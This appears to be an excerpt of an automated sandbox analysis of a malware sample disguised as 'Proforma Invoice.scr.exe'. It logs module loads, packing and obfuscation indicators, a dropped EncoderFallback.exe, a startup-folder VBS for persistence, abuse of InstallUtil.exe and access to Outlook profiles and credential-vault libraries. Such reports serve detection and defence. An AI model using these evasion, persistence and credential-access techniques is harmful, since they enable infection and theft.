                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Proforma Invoice.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Proforma Invoice.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003C69000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Proforma Invoice.scr.exe, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003578000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003C69000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2771284089.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Proforma Invoice.scr.exe, 00000000.00000002.2480596735.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.scr.exe, 00000000.00000002.2463724121.0000000003A22000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, rPpUx8IYtCf2OCkidwJ.cs.Net Code: Type.GetTypeFromHandle(a5LH887NkAJ9KItLhcU.qmHB75aU9A(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(a5LH887NkAJ9KItLhcU.qmHB75aU9A(16777252)),Type.GetTypeFromHandle(a5LH887NkAJ9KItLhcU.qmHB75aU9A(16777284))})
                      .NET source code contains potential unpacker
                      Source: Proforma Invoice.scr.exe, Aqzdppc.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: EncoderFallback.exe.0.dr, Aqzdppc.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Proforma Invoice.scr.exe.6360000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Proforma Invoice.scr.exe.6360000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Proforma Invoice.scr.exe.6360000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Proforma Invoice.scr.exe.6360000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Proforma Invoice.scr.exe.6360000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Proforma Invoice.scr.exe.35e3220.8.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.6430000.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.38513e0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.3943e00.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2454133386.0000000002618000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2480782000.0000000006430000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.scr.exe PID: 4000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EncoderFallback.exe PID: 6828, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeCode function: 0_2_06DC3E01 push es; ret 0_2_06DC3E07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B70C54 push ebx; retf 3_2_00B70C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00B70C45 push ebx; retf 3_2_00B70C52
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeCode function: 6_2_07383E01 push es; ret 6_2_07383E07
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00F70C53 push ebx; retf 7_2_00F70C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00F70C45 push ebx; retf 7_2_00F70C52
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'IG552r4FoQDWp1Lmq4C'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, psDPth7zcdHJ8jQAYFF.csHigh entropy of concatenated method names: 'IL0KcrL9DR', 'jTKKZCXn7N', 'dHFKH6BdOp', 'voOKOSFAxX', 'eHnKQ5YnSO', 'sFRKV3eFd0', 'MjMKyJJrb1', 'bk61Xm6atF', 'pZtK0B8HBt', 'xrRKNi0r14'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, X9GnBCIAa43rtnS11oP.csHigh entropy of concatenated method names: 'NNFIgl5MZs', 'ruuIaUJ3qs', 'ChprMBUUSjPyZQwXTE3', 'BvKpmgU424Mu9ayYcew', 'vKoQqiUjiKNQlGfVqZv', 'sNskefUnEdBjYYXGUFR', 'lF7AGwUGXJSquFwL1p6', 'qUMxv6U6QJq7DMWFlKR', 'W0GkNaUWgJ2ZNfCqKny', 'R2jLcVUBKO4FwDpwaCh'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, rPpUx8IYtCf2OCkidwJ.csHigh entropy of concatenated method names: 'v6sDJP42Iq7xZxby1UV', 'VrCfJr4qxSvkZThgIjZ', 'VeB77Txuj9', 'jedMFu4t4cC8DG1TgSc', 'vZpePM4CWkZdEhOPx3U', 'lehmaL4m8JQnUwwjUEs', 'hganrV43xqQSaMaMRaF', 'K8u2Pq4r2CduEuUSSBh', 'Ohpmi84dv1bvfD1mr2D', 'nuwyBq4Sh45IefRGByg'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, lx2PSRMF3CQCnUwdnWI.csHigh entropy of concatenated method names: 'OyoMEguRYI', 'ODXM18j5R4', 'jLyMolYu8E', 'D8KM5kniYT', 'hYuMAKH7jc', 'tLwMK9HD31', 'JJUMgcOZ26', 'KHTMaqoItd', 'sciMl33k9D', 'JQxMkdGYmT'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, wMZRowFyUyw4p8mstA6.csHigh entropy of concatenated method names: 't7NFNyQLa5', 'GoQBIXUi0k4evAIGcrI', 'xPQc94URNDLGfeMQ1oi', 'ueUVkPUMEoL7y3mpXPS', 'ztv2bwUbBqfgHdRVltG', 'xG87htUJNYXjmkDcpb0'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, wVWhag7hvjBwj3O1Nm1.csHigh entropy of concatenated method names: 'Iab7wJ7Pg6', 'MNS7TGslvQ', 'EeS7fsowuU', 'uoZ7t3kym4', 'AxN7CWSMcQ', 'bPs7mKtiSC', 'm3P73Aounx', 'mgb7rwOSfg', 'T047dEa0D7', 'foN7SieGVI'
                      Source: 0.2.Proforma Invoice.scr.exe.38513e0.7.raw.unpack, MY3AT2RNNgI03btKK3V.csHigh entropy of concatenated method names: 'MpeRDiOKB0', 'otWRp7NPrR', 'i9ARY8eqrF', 'wowRhBs4cx', 'o8oReoCAA6', 'ND6Njxh5gHHggDsQ1Hc', 'sEUAk2hAYgJMDGk10Mc', 'Ga0FTIhK6lMr1uPouTY', 'FTEO0Nhgn6m5fL0C7Y6', 'ls7LmmhanUSu5KqlAtE'
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeFile created: C:\Users\user\AppData\Roaming\EncoderFallback.exeJump to dropped file

                      Boot Survival

                      barindex
                      Drops VBS files to the startup folder
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
